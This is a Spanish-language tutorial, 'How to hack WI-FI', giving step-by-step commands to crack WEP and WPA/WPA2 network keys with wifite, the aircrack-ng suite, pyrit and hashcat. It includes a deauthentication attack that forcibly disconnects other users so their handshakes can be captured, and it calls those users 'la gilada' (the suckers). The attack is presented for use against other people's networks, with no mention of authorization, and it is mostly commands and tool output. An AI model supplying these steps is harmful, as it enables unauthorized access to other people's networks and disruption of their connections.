Cómo hackear WI-FI
Contenido
WEP
Si ves una red WEP con suficiente señal y usuarios conectados (clientes) muy probablemente consigas la clave.
Wifite
Abrimos una terminal y ejecutamos wifite como root.
sudo wifite
.;' `;, .;' ,;' `;, `;, WiFite v2 (r86) .;' ,;' ,;' `;, `;, `;, :: :: : ( ) : :: :: automated wireless auditor ':. ':. ':. /_\ ,:' ,:' ,:' ':. ':. /___\ ,:' ,:' designed for Linux ':. /_____\ ,:' / \ [+] scanning for wireless devices... [+] enabling monitor mode on wlp3s0... done [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready. [0:00:04] scanning wireless networks. 0 targets and 0 clients found [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
Cuando aparezcan suficintes redes y clientes le damos CTRL+C
NUM ESSID CH ENCR POWER WPS? CLIENT --- -------------------- -- ---- ----- ---- ------ 1 Fibertel 1 WEP 53db no 2 Arnet 1 WPA 47db no 3 Goku 1 WPA2 32db no [+] select target numbers (1-5) separated by commas, or 'all':
Elegimos una red que use WEP y tenga clientes
Espera a que genere suficientes IVs.
Aveces wifite pierde la paciencia y corta antes, talvez quieras probar el método de aircrack que es un poco mas manual.
Aircrack
Levantamos una interfaz en modo monitor
sudo airmon-ng start wlan0
Escaneamos para ver las redes
sudo airodump-ng mon0
Cuando hayamos detectado las redes deseadas cortamos con CTRL+C.
Empezamos a capturar el tráfico
sudo airodump-ng -w salida --ivs --channel 1 --bssid 01:23:45:67:89:ab mon0
Y lo dejamos capturando todos los IVs que necesitemos (columna #Data
).
Inyectamos paquetes
Si no hay muchos clientes o tráfico o queremos acelerar el proceso podemos inyectar paquetes con aireplay.
** TODO ** mira las opciones de aireplay-ng con -h
Crackeamos la clave
Para esto necesitaras muchos IVs, alrededor de 5000 o 10000 suelen ser suficientes. No es necesario detener el airodump para hacer esto, si no alcanzan los IVs en el momento aircrack esperará y volverá a intentar cuando haya más.
aircrack-ng salida.cap
WPA / WPA2
Capturar Saludo (Handshake)
Handshaker
Wifite
Sigue los pasos para WEP pero seleccionando una red diferente. Muchas veces no funciona.
Aircrack
Primero levantamos una interfaz en modo monitor (ver más arriba).
Luego empezá a capturar los paquetes en un archivo. Este comando guardará los paquetes enviados desde y hacia el router con mac address 00:11:aa:bb:cc:dd y canal 11 en el archivo salida.cap.
sudo airodump-ng --channel 11 --bssid 00:11:aa:bb:cc:dd -w salida mon0
Y finalmente desconecta a la gilada (tiene que haber usuarios conectados al wifi y tenes que tener buena señal de ellos). Para esto usamos aireplay con la opcion --deauth o -0 y cuantos intentos de desconexion queremos hacer. Para esto es conveniente tener buena señal tanto con el router como con el cliente.
aireplay-ng -0 8 -c aa:aa:aa:aa:aa:aa -a 00:11:aa:bb:cc:dd mon0
Validar Saludo
Pyrit es un programa muy completo para crackear claves WPA y tiene una funcionalidad muy practica que nos dice la calidad del saludo que hemos capturado. Aveces la mala señal hace que tengamos que capturar varios saludos hasta que uno esta completo.
pyrit -r salida.cap analyze
Limpiar Saludo
Junto con el saludo se captura mucho trafico, con pyrit podemos limpiar la salida capturada y guardar solo el saludo que queremos.
pyrit -r salida.cap -o salida-limpia.cap strip
Crackear Saludo
Pyrit es mas rápido para crackear claves basado en diccionarios pero no tiene otras funcionalidades que si tienen otros programas especificos de crackeo de claves como mascaras y ataques de fuerza bruta. Por esto aveces vamos a preferir usar hashcat.
Crackear con Hashcat
Primero vamos a tener que convertir la captura del formato cap al formato hccap que es el utilizado por hashcat. Lo hacemos con el siguiente comando que nos dejara un archivo salida.hccap
aircrack-ng salida.cap -J salida
A crackear que se acaba el mundo!
hashcat -m 2500 -a3 salida.hccap ?d?d?d?d?d?d?d?d